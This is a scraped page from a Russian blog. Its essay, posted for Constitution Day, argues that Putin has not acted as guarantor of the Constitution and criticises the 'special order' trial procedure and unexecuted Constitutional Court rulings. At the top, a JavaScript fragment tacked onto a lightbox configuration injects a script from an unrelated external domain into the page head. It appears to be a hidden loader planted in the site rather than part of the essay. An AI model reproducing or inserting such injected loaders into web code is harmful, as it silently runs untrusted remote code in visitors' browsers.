, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Что мешает Путину, исполнив волю народа, установить власть Конституции?

06 Дек

12 декабря 1993 г. всенародным голосованием  была принята ныне действующая Конституция России.

Тем самым единственный источник власти в стране, многонациональный народ, определил Россию, как демократическое, правовое государство, в котором: — человек, его права и свободы есть высшая ценность, а обязанностью осуществляющих государственную власть является признание, соблюдение и защита прав и свобод россиян; — социальная политика государства должна быть направлена на создание таких условий, которые обеспечивали бы достойную жизнь и свободное развитие россиян;

-  каждому гарантируется судебная защита его прав и свобод от решений и действий (или бездействия) органов государственной власти  и должностных лиц; — не должны издаваться законы, отменяющие или умаляющие права и свободы россиян. Именно с Конституцией, провозгласившей человека высшей ценностью, россияне должны сверять содержание конкретных законов, оказывающих воздействие на их жизнь.

Казалось, что взявшиеся осуществлять государственную власть начнут исполнять волю народа, изложенную в Конституции России, начнут устанавливать власть Конституции, обеспечивая её гарантом и правосудием.

Но этого не случилось. Президент с огромными полномочиями в России есть, а гарант Конституции  так и не заявил о себе.

Путину не удалось наладить государственное управление страной, так как изложено в Основном законе страны.

Ещё пять лет Путин будет  осуществлять президентскую власть, сохраняя или увеличивая разрыв между лицами, осуществляющими государственную власть и обществом, между сотнями  шикующих назначенцев  и  миллионами нищенствующих  россиян.

Исправить данную позорную ситуацию можно лишь начав исполнять обязанности гаранта Конституции, установив власть Конституции, обеспеченную её гарантом и правосудием.

Полномочий для этого у Путина достаточно,  да и всенародная поддержка ему в этой деятельности обеспечена.

Но вот в чём проблема. Единственный источник власти в стране, многонациональный народ, поддерживает Путина один раз в шесть лет, на выборах президента. Всё остальное время народ в основной своей массе молчалив, нищенствует и безропотно наблюдает за происходящим в стране.

А вот те, кто попал в число назначенцев, постоянно с Путиным. Поэтому самое главное внимание и забота о них. Им зарплаты, что в разы больше, чем таким же чиновникам в странах с более развитой экономикой.

Им государственные награды, премии и обслуживание за государственный счёт.

А некоторым, кто попался на разворовывании народного достояния и взятках, послабления в наказаниях. И сроки минимальные или условные и «сомнительная собственность» при них.

Назначенцы сегодня высшая ценность для осуществления президентской власти, поскольку являются его опорой.

Похоже, только на это у Путина и хватает сил.

А быть гарантом Конституции, это значит всех россиян, их права и свободы сделать высшей ценностью, но для этого нужна воля, чтобы  заставить  назначенцев признавать, соблюдать и защищать права и свободы  россиян. Но заставить уже  не получается.

События в Иркутской области показывают, что с этим большие проблемы.

Не сделал Путин союзником в деле установления власти Конституции России и судебную власть.

Для того что бы в стране было правосудие, надо иметь в государстве механизм, который заставит судей подчиняться, повиноваться, беспрекословно слушаться, стать в зависимость только от Конституции.

Только тогда реализуется гарантированное каждому право на судебную защиту от решений и действий (или бездействия) органов власти и должностных лиц.

Полномочий осуществить такую работу у Путина достаточно. Достаточно и времени. Но нет фактов, говорящих о желании Путина быть гарантом Конституции.

Много раз писал http://rapsinews.ru/judicial_news/20140325/271004905.html   о том, что гарант Конституции Владимир Путин, подписывал и обнародовал федеральные законы, которые Конституционный Суд РФ (КС) признавал не соответствующими Конституции.

И Путин по поводу этого говорил http://www.kremlin.ru/events/president/news/56366 : «Законы пишут, как известно, люди — людям свойственно ошибаться.

Однако ежегодно КС признает https://www.kommersant.ru/doc/2745897 несколько десятков законов не соответствующими Основному закону страны и это уже свидетельствует о небрежной законотворческой деятельности.

При этом  четверть  решений КС остаётся неисполненными. Все они касаются изменений российских законов, положения которых КС признал не соответствующими (частично или полностью) Конституции.

А гарант Конституции по этому поводу молчит.

В стране сложилась ситуация, при которой уже невозможно «защищать Конституцию».

Так, Конституция, статья 50, требует: «При осуществлении правосудия не допускается использование доказательств, полученных с нарушением федерального закона».

Но это требование невозможно исполнить, поскольку в стране установлен особый порядок судебного разбирательства, когда суд не исследует и не оценивает доказательства, собранные по уголовному делу.

И этот, противоречащий Конституции, статьи  49, 59, 51, 55,   и  статьям 1, 6, 7, 14, 15, 17, 73, 74,75 части 2 статьи 77, 87, 88 УПК РФ особый порядок был принят Государственной Думой 21 июня 2003 года, одобрен Советом Федерации 26 июня 2003 года и подписан https://base.garant.ru/1353017/     Президентом Российской Федерации В.В. Путиным.

Последствия от такого неподчинения Конституции огромны.

Более 15 лет, ежегодно в таком порядке осуждают 500−700 тысяч подсудимых, согласившихся с предъявленным им обвинением.

Так, в 2018 г. было рассмотрено в особом порядке  — 69% уголовных дел, поступивших в суд.

И только недавно этому судопроизводству удивился и сам гарант Конституции Владимир Путин, призывая https://ria.ru/20190319/1551926290.html      соответствующие органы крайне ответственно относиться к рассмотрению в судах уголовных дел в особом порядке.

И вот призыв гаранта Конституции услышали.

За девять месяцев 2019 года российские суды рассмотрели https://www.rbc.ru/society/03/12/2019/5de611529a794764bafd14bd?utm_referrer=https%3A%2F%2Fzen.yandex.com%2F%3Ffrom%3Dspecial&utm_source=YandexZenSpecial  дела в отношении 602 тыс. обвиняемых, и из них 57% (344 тыс.) были осуждены в особом порядке.

И это происходит в стране, где СМИ постоянно пишут о пыточном судопроизводстве, заставляющем назначенного обвиняемым брать на себя чужую вину, либо признаваться в том, чего не совершал.

Как долго наша правоприменительная практика будет руководствоваться призывами гаранта Конституции, а не Законами?

С наступающим Вас «Днём Конституции России», мои соотечественники.

 

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.